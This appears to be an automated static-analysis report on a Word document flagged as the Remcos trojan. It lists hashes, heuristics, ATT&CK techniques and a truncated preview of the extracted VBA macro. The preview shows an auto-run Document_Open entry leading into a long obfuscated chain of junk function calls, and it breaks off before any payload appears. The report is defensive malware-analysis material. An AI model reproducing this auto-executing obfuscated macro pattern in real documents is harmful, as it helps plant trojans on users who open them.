Win.Trojan.Remcos-6656024-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 4e0bcef2b9251e2a…

MALICIOUS

Office (OLE)

914.0 KB Created: 2017-07-18 19:46:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: 81e516b87acc0a3d13846be50d9fe467 SHA-1: 33db9cb899c5b8ca451b0a89822d55d7b14f48ca SHA-256: 4e0bcef2b9251e2aaecbf6501c8df706bf449b0e12434873833c6091deb94f0e
190 Risk Score

Malware Insights

Win.Trojan.Remcos-6656024-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Win.Trojan.Remcos-6656024-0' strongly suggests the malware family and its malicious intent. The macro likely downloads and executes a second-stage payload, consistent with common trojan behavior.

Heuristics 6

  • ClamAV: Win.Trojan.Remcos-6656024-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Remcos-6656024-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 348786 bytes
SHA-256: ae1bb7c384256023986b425f20493b5ae97471899ca00eb00a55083e14947642
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.file2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub dOcUmeNT_OpEN(): Call ltknbhsbibalnxj: End Sub
Sub ltknbhsbibalnxj()
Call dahgvoekhyeivmg
End Sub
Private Sub dahgvoekhyeivmg()
Call alchoseygumndob
End Sub
Private Function alchoseygumndob() As Currency
Call kutyxiljlqxybys
End Function
Static Function kutyxiljlqxybys() As String
Call rwdopbuhaojodlc
End Function
Function rwdopbuhaojodlc() As Currency
Call sgodnawukkbmrpn
End Function
Sub sgodnawukkbmrpn()
Call qjtrucauehuqixs
End Sub
Private Function qjtrucauehuqixs() As Single
Call ivyehkxjtdsbmwx
End Function
Private Function ivyehkxjtdsbmwx() As Integer
Call xzwqdvvmsasstzw
End Function
Function xzwqdvvmsasstzw() As Object
Call zbrsqtclxyvpqkq
End Function
Function zbrsqtclxyvpqkq() As Single
Call fhkcbnvqbubtnhj
End Function
Private Sub fhkcbnvqbubtnhj()
Call fvdkrmikaqnewvc
End Sub
Static Function fvdkrmikaqnewvc() As Variant
Call dcqrrpxrknbvjnp
End Function
Sub dcqrrpxrknbvjnp()
Call nhyphetvzkrtmnx
End Sub
Function nhyphetvzkrtmnx() As Single
Call cpfuwqdeoglxpze
End Function
Static Sub cpfuwqdeoglxpze()
Call xsponusfqqaergo
End Sub
Static Sub xsponusfqqaergo()
Call uzcwnxhmannvexb
End Sub
Static Function uzcwnxhmannvexb() As Date
Call fekuendqpkesgxj
End Function
Sub fekuendqpkesgxj()
Call tmrzsynaehyxjkq
End Sub
Private Sub tmrzsynaehyxjkq()
Call vtuuyxegydvhbet
End Sub
Private Sub vtuuyxegydvhbet()
Call usqpmyxzdbuxxdp
End Sub
Static Sub usqpmyxzdbuxxdp()
Call mznigfjhcyyvfsm
End Sub
Function mznigfjhcyyvfsm() As String
Call jkijzjjwbufaoth
End Function
Private Function jkijzjjwbufaoth() As Byte
Call ttzaizqggqqkldy
End Function
Static Function ttzaizqggqqkldy() As Byte
Call avjraszevocbnri
End Function
Static Sub avjraszevocbnri()
Call bfugyrbrekuzbvt
End Sub
Sub bfugyrbrekuzbvt()
Call yizuftfrzhndsdy
End Sub
Private Function yizuftfrzhndsdy() As Variant
Call rtegsbchndlowcd
End Function
Static Function rtegsbchndlowcd() As Double
Call gxcsomajnalfdeb
End Function
Static Function gxcsomajnalfdeb()
Call iaxubkhiryocapw
End Function
Private Function iaxubkhiryocapw() As Variant
Call ofqemeanwvvgxmp
End Function
Static Sub ofqemeanwvvgxmp()
Call oujmcdnivqhrgai
End Sub
Private Sub oujmcdnivqhrgai()
Call mawucgcpfnuitsv
End Sub
Sub mawucgcpfnuitsv()
Call wfertvytukkgwsd
End Sub
Private Function wfertvytukkgwsd() As Variant
Call kolxhhicjgfkzek
End Function
Private Sub kolxhhicjgfkzek()
Call muosnfziddcurzn
End Sub
Private Sub muosnfziddcurzn()
Call eigfmogisdyjqpf
End Sub
Static Sub eigfmogisdyjqpf()
Call xqdygvsrszchyec
End Sub
Function xqdygvsrszchyec() As Object
Call tbyzzzsfrvkmhfx
End Function
Function tbyzzzsfrvkmhfx() As Long
Call dkoqipzqvsvwfpo
End Function
Private Sub dkoqipzqvsvwfpo()
Call klzgaiiolphngdy
End Sub
Static Sub klzgaiiolphngdy()
Call lvkvyhkbulyluhj
End Sub
Static Sub lvkvyhkbulyluhj()
Call jyojfjobojrplpo
End Sub
Static Sub jyojfjobojrplpo()
Call bktwsrlqdfqapot
End Sub
Sub bktwsrlqdfqapot()
Call qosiocktdcqqwqr
End Sub
Static Function qosiocktdcqqwqr() As Date
Call srnkbaqshzsotbm
End Function
Static Function srnkbaqshzsotbm() As Boolean
Call ywfumukxmwzsqyf
End Function
Sub ywfumukxmwzsqyf()
Call zkycctxrlsldzmy
End Sub
Private Sub zkycctxrlsldzmy()
Call wrljcwlyvoyunek
End Sub
Private Function wrljcwlyvoyunek() As Variant
Call gwuhslicklprpet
End Function
Static Sub gwuhslicklprpet()
Call vebmhxrmzijwsqa
End Sub
Sub vebmhxrmzijwsqa()
Call wldimvistfggkld
End Sub
Sub wldimvistfggkld()
Call vkadbxblydfwgjz
End Sub
Private Sub vkadbxblydfwgjz()
Call orxwventxzjuoyw
End Sub
Static Function orxwventxzjuoyw() As Byte
Call kcsxoinhwvrzxar
End Function
Function kcsxoinhwvrzxar()
Call naegifizltziybd
End Function
Sub naegifizltziybd()

... (truncated)